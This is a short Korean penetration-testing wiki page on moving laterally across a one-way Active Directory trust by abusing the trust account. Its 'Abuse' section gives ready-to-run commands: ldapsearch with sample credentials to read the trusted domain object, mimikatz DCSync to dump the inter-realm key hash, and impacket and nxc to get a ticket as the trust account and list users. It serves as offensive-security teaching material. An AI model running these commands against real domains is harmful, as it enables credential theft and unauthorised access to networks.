Domain Lateral movement

ACS.LOCAL 도메인 객체는 PENTEST.WIKI 리소스에 접근하거나 정보 수집이 가능하지만 그 반대의 경우는 불가능한 상황을 일방향 신뢰 관계라고 하며 ACS를 신뢰받는 도메인, PENTEST를 신뢰하는 도메인이라고 합니다.

설계 의도 상 공격자가 PENTEST를 장악하더라도 ACS로 측면이동은 불가능한 게 맞지만, 신뢰 관계를 유지하기 위해 필수불가결한 신뢰 계정을 통해 공격자는 외부 도메인 정보수집 및 측면이동이 가능합니다.

Abuse

GUID 디코딩 코드

import base64
import uuid

# base64 문자열
b64_guid = ''

raw_bytes = base64.b64decode(b64_guid)
guid = str(uuid.UUID(bytes_le=raw_bytes))
print("GUID:", guid)

# 장악한 도메인 TDO로부터 inter-realm key 인코딩 값 덤프
ldapsearch -x -H ldap://192.168.1.11 -D '[email protected]' -w 'Password123!' -b 'dc=pentest,dc=wiki' "(objectClass=trustedDomain)" objectGUID

# inter-realm key NT 해시 덤프
mimikatz # lsadump::dcsync /domain:contoso.com /guid:'<{guid}>'

# 신뢰 계정의 TGT 발급 이후 SMB 인증을 통한 정보 수집
impacket-getTGT 'acs.local/pentest$' -hashes :'<nt-hash>'
nxc smb 'acs.local' -u 'pentest$' -k --users

Demo

PreviousOne way Trust NextTrust Account TGT

Last updated 4 months ago

hashtagAbuse

hashtagDemo

Abuse

Demo